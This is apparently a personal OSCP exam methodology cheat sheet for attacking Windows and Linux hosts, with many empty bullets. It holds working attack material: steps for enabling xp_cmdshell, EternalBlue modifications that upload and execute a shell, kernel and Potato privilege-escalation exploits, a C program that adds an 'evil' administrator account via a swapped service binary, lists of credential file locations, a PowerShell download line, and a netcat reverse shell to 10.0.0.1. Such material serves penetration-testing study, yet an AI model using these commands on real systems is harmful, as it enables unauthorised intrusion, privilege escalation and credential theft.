My OSCP Methodology
- service -> exploit (searchsploit + google)
- banner
- default creds (hydra)
- Anonymous login
- Put files
- if exists web service, check if web and ftp has the same path
- nmap info
- service -> exploit (searchsploit + google)
- banner
- default creds (hydra)
- default creds with nsr (hydra)
- nmap info
-
nmap info:
- OS samba
- Computer name/NetBIOS name
- Domain name
- Workgroup
- OS of machine
-
service (OS samba or nmap service header (139 & 445)) -> exploit (searchsploit + google)
-
enum4linux
-
smbclient *smbclient -L -N
- connect to samba in a specific share with creds
- smbclient \\ip\share -U username
- connect to samba in a specific share with creds
-
Connect to MSSQL:
-
Enable xp_cmdshell:
Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. (return status = 0)
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. (return status = 0)
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=<pass>,ms-sql-xp-cmdshell.cmd="net user " <ip>
-
Service -> exploit (searchsploit + google)
-
nmap info
-
if directories from nmap output, OPTIONS request for put http method availability.
-
nikto:
- default
- CGI all
-
source
-
gobuster:
-
with common.txt:
-
With big.txt:
-
With medium.txt:
-
-
Play around with burpsuite (Spider, repeater)
-
if web page contains big articles qith many words use cewl:
- Windows Server 2003 and IIS 6.0 privledge escalation using impersonation token (Tokens kiddnapping revenge):
- use https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
- Needs Listener
git clone https://github.com/andyacer/ms08_067.git
- configuration
- pip install impacket
- 2 reverse options for shellcoding:
- Use the third with 443
- Use the third with default
- Use second with default
- Use second with port of third or another port
- Choose the right option of menu.
- Find OS of machine
- Guess lanhuage
- Needs Listener
git clone https://github.com/worawit/MS17-010.git
-
If needed USERNAME-"//"
-
next add the following 2 lines to below def smb
smb_send_file(smbConn, '/root/htb/blue/puckieshell443.exe', 'C', '/puckieshell443.exe')
service_exec(conn, r'cmd /c c:\puckieshell443.exe')
-
custom payload:
-
Needs Listener
- use the https://github.com/nickvourd/eternalblue_win7_auto_gen in order to merge binaries nad payload
- Run the following: python MS17-010/eternalblue_exploit7.py /tmp/sc_x.bin
- Needs Listener
- use the https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
- serve the MS10-059.exe (https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe) to victim
- run exploit:
- Need Listener
-
compile:
-
no need listener (insta run)
- use the https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
- Check the architecture of victim and choose the right exe
- upload to victim machine
- run the following:
- Needs Listener
- use https://www.exploit-db.com/exploits/39719
- Edit the file:
- end of file add this Invoke-MS16-032
- Inside th file search and find cmd.exe two times.
- Change with shell.exe in current directory in victim which you are.
- generate shell.exe:
- serve the shell.exe to victim
- open a listener
- run the ps1 exploit:
What is: Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
Affected systems: Windows 7,8,10, Server 2008, Server 2012
Guide: https://foxglovesecurity.com/2016/01/16/hot-potato/
Use: https://github.com/foxglovesec/Potato
What is: Rotten Potato and its standalone variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges
Affetced sytsems: Windows 7,8,10, Server 2008, Server 2012, Server 2016
Guide: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ https://0xdf.gitlab.io/2018/08/04/htb-silo.html
Use: https://github.com/nickvourd/lonelypotato
- Rotten Potato from default opens meterpreter, use lonely potato which opens in line shell
What is: Juicy potato is basically a weaponized version of the RottenPotato exploit that exploits the way Microsoft handles tokens. Through this, we achieve privilege escalation.
Affetcted Systems:
- Windows 7 Enterprise
- Windows 8.1 Enterprise
- Windows 10 Enterprise
- Windows 10 Professional
- Windows Server 2008 R2 Enterprise
- Windows Server 2012 Datacenter
- Windows Server 2016 Standard
Find CLSID here: https://ohpe.it/juicy-potato/CLSID/
Guides: https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/#juicy-potato-abusing-the-golden-privileges https://hunter2.gitbook.io/darthsidious/privilege-escalation/juicy-potato#:~:text=Juicy%20potato%20is%20basically%20a,this%2C%20we%20achieve%20privilege%20escalation.
Use: https://github.com/ohpe/juicy-potato
-
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- searchsploit
-
systeminfo
- Architecture
- Numbers of Proccessors
- Domain
- HotFixes
- System Locale
- Input Locale
-
Numbers of cores of processors:
-
Windows Privileges:
- More info here: https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf
- SeDebugPrivilege
- SeRestorePrivilege
- SeBackupPrivilege
- SeTakeOwnershipPrivilege
- SeTcbPrivilege
- SeCreateToken Privilege
- SeLoadDriver Privilege
- SeImpersonate & SeAssignPrimaryToken Priv.
- More info here: https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf
-
Users of system and their groups
- net user
- net user *Password required *groups
-
whoami /groups
-
Insecure File Permissions:
or with powershell
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
- if full access the User can modify it.
Custom exploit: #include <stdlib.h>
int main (){ int i; i = system ("net user evil Ev!lpass /add"); i = system ("net localgroup administrators evil /add");
retunr 0; }
Compile from windows: i686-w64-mingw32-gcc adduser.c -o adduser.exe
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe" move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
dir "C:\Program Files\Serviio\bin"
net stop Servilo
if access denied try:wmic service where caption="Serviio" get name, caption, state, startmode -> if Auto atrribute inside then will auto execute after reboot.
whoami /priv if SeShutdownPrivilege then we can restart machine: * shutdown /r /t 0
net localgroup Administrators
-
Unqoted Service Path:
-
Enumerating World Writable Directories:
-
Applications installed versions:
-
Schedule tasks
-
Windows-Exploit-Suggester
- python windows-exploit-suggester.py --database 2020-08-09-mssb.xls --systeminfo grandpa.txt
-
Serlock
- Config: Add to the last line the "Find-AllVulns"
- Download and run Sherlock:
-
Watson
- Find .NET latest version of victim:
- Fow older than windows 10 download zip version of watson v.1: https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437
- Build exe to visual studio
-
PowerUP
- Config: add to the last line the "Invoke-AllChecks"
- Download and run PowerUp:
-
Stored Creadentials:
-
cmdkey /list
- if interactive module enabled 100% runas as other user
- if domain and user exist try again runas as other user
-
Stored as plaintext or base64
- C:\unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\Windows\system32\sysprep\sysprep.xml
-
If system is running an IIS web server the web.config file:
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
- C:\inetpub\wwwroot\web.config
-
Local administrators passwords can also retrieved via the Group Policy Preferences:
- C:\ProgramData\Microsoft\Group Policy\History????\Machine\Preferences\Groups\Groups.xml
- \????\SYSVOL\Policies????\MACHINE\Preferences\Groups\Groups.xml
-
Except of the Group.xml file the cpassword attribute can be found in other policy preference files as well such as:
- Services\Services.xml
- ScheduledTasks\ScheduledTasks.xml
- Printers\Printers.xml
- Drives\Drives.xml
- DataSources\DataSources.xml
-
Most Windows systems they are running McAfee as their endpoint protection. The password is stored encrypted in the SiteList.xml file:
- %AllUsersProfile%Application Data\McAfee\Common Framework\SiteList.xml
-
powershell -command "& { iwr http://192.168.199.1/win.txt -OutFile win.txt }"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
plink
→ What is plink:
Plink is a command-line connection tool similar to UNIX ssh. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink is a command line application.It makes simple interactive connection to a remote server. This means that you cannot just double-click on its icon to run it and instead you have to bring up a console window.
Example to expose ports: 445 (samba)
How to expose a port on your local machine:
[local_machine]: systemctl start ssh
→ Upload plink.exe on remote machine as binary (mode)
[remote_machine]: plink.exe -l [username] -pw [password] -R [port]:127.0.0.1:[port] [ip]
→ After that, the victim’s port will be exposed on your local machine (127.0.0.1)